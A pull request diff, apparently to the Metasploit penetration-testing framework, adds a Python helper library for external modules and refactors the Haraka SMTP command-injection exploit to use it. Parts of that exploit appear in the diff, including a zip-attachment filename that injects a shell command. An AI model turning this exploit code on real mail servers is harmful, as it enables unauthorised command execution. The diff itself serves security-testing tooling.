### PR TITLE
Add a shim lib for external modules

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -88,3 +88,6 @@ data/meterpreter/ext_server_pivot.*.dll
 
 # local docker compose overrides
 docker-compose.local*
+
+# Ignore python bytecode
+*.pyc

--- a/lib/msf/core/modules/external/bridge.rb
+++ b/lib/msf/core/modules/external/bridge.rb
@@ -37,7 +37,7 @@ class Msf::Modules::External::Bridge
     self.running = false
     self.path = module_path
     self.env = {
-      'PYTHONPATH' => File.expand_path('../python', __FILE__)
+      'PYTHONPATH' => ENV['PYTHONPATH'] + File::PATH_SEPARATOR + File.expand_path('../python', __FILE__)
     }
   end
 

--- a/lib/msf/core/modules/external/bridge.rb
+++ b/lib/msf/core/modules/external/bridge.rb
@@ -36,12 +36,16 @@ class Msf::Modules::External::Bridge
   def initialize(module_path)
     self.running = false
     self.path = module_path
+    self.env = {
+      'PYTHONPATH' => File.expand_path('../python', __FILE__)
+    }
   end
 
   protected
 
   attr_writer :path, :running
   attr_accessor :ios
+  attr_accessor :env
 
   def describe
     resp = send_receive(Msf::Modules::External::Message.new(:describe))
@@ -57,7 +61,7 @@ class Msf::Modules::External::Bridge
   end
 
   def send(message)
-    input, output, status = ::Open3.popen3([self.path, self.path])
+    input, output, status = ::Open3.popen3(env, [self.path, self.path])
     self.ios = [input, output, status]
     case Rex::ThreadSafe.select(nil, [input], nil, 0.1)
     when nil

--- a/lib/msf/core/modules/external/python/metasploit/module.py
+++ b/lib/msf/core/modules/external/python/metasploit/module.py
@@ -1,0 +1,20 @@
+import sys, os, json
+
+def log(message, level='info'):
+    print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
+        'level': level,
+        'message': message
+    }}))
+    sys.stdout.flush()
+
+def run(metadata, exploit):
+    req = json.loads(os.read(0, 10000))
+    if req['method'] == 'describe':
+        print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
+    elif req['method'] == 'run':
+        args = req['params']
+        exploit(args)
+        print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
+            'message': 'Exploit completed'
+        }}))
+        sys.stdout.flush()

--- a/lib/msf/core/modules/external/shim.rb
+++ b/lib/msf/core/modules/external/shim.rb
@@ -4,7 +4,7 @@ require 'msf/core/modules/external/bridge'
 
 class Msf::Modules::External::Shim
   def self.generate(module_path)
-    mod = Msf::Modules::External::Bridge.new(module_path)
+    mod = Msf::Modules::External::Bridge.open(module_path)
     return '' unless mod.meta
     case mod.meta['type']
     when 'remote_exploit.cmd_stager.wget'
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts)
-    mod = Msf::Modules::External::Bridge.new(#{mod.path.dump})
+    mod = Msf::Modules::External::Bridge.open(#{mod.path.dump})
     mod.run(datastore.merge(command: cmd))
     wait_status(mod)
     true

--- a/modules/exploits/linux/smtp/haraka.py
+++ b/modules/exploits/linux/smtp/haraka.py
@@ -19,7 +19,7 @@ from email.mime.text import MIMEText
 from datetime import datetime
 import zipfile
 import StringIO
-import sys, os, json
+from metasploit import module
 
 metadata = {
     'name': 'Haraka SMTP Command Injection',
@@ -47,13 +47,6 @@ metadata = {
         'rport': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 25}
      }}
 
-def log(message, level='info'):
-    print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
-        'level': level,
-        'message': message
-    }}))
-    sys.stdout.flush()
-
 def send_mail(to, mailserver, cmd, mfrom, port):
     msg = MIMEMultipart()
     html = "harakiri"
@@ -62,21 +55,21 @@ def send_mail(to, mailserver, cmd, mfrom, port):
     msg['To'] = to
     f = "harakiri.zip"
     msg.attach(MIMEText(html))
-    log("Send harariki to %s, commandline: %s , mailserver %s is used for delivery"%(to, cmd, mailserver), 'debug')
+    module.log("Send harariki to %s, commandline: %s , mailserver %s is used for delivery"%(to, cmd, mailserver), 'debug')
     part = MIMEApplication(create_zip(cmd),Name="harakiri.zip")
     part['Content-Disposition'] = 'attachment; filename="harakiri.zip"'
     msg.attach(part)
-    log("Sending mail to target server...")
-    log(msg.as_string(), 'debug')
+    module.log("Sending mail to target server...")
+    module.log(msg.as_string(), 'debug')
     s = smtplib.SMTP(mailserver, port)
     try:
       resp = s.sendmail(mfrom, to, msg.as_string())
     except smtplib.SMTPDataError as err:
       if err[0] == 450:
-        log("Triggered bug in target server (%s)"%err[1], 'good')
+        module.log("Triggered bug in target server (%s)"%err[1], 'good')
         return(True)
-    log("Bug not triggered in target server", 'error')
-    log("it may not be vulnerable or have the attachment plugin activated", 'error')
+    module.log("Bug not triggered in target server", 'error')
+    module.log("it may not be vulnerable or have the attachment plugin activated", 'error')
     s.close()
     return(False)
 
@@ -101,14 +94,8 @@ def create_zip(cmd="touch /tmp/harakiri"):
     z1.append("a\";%s;echo \"a.zip"%cmd, z2.read())
     return(z1.read())
 
+def exploit(args):
+    send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport']))
+
 if __name__ == '__main__':
-    req = json.loads(os.read(0, 10000))
-    if req['method'] == 'describe':
-        print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
-    elif req['method'] == 'run':
-        args = req['params']
-        send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport']))
-        print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
-            'message': 'Exploit completed'
-        }}))
-        sys.stdout.flush()
+    module.run(metadata, exploit)


### PR DESCRIPTION
This adds a small shim library to make adding external modules simpler. This removes some implementation details from how an external module interface from the module itself.

## Verification Steps

 - [x] Ensure that 'msfconsole' starts as expected without any module exceptions when running on a platform where python is installed
 - [x] Verify that 'exploits/linux/smtp/haraka' continues working as expected.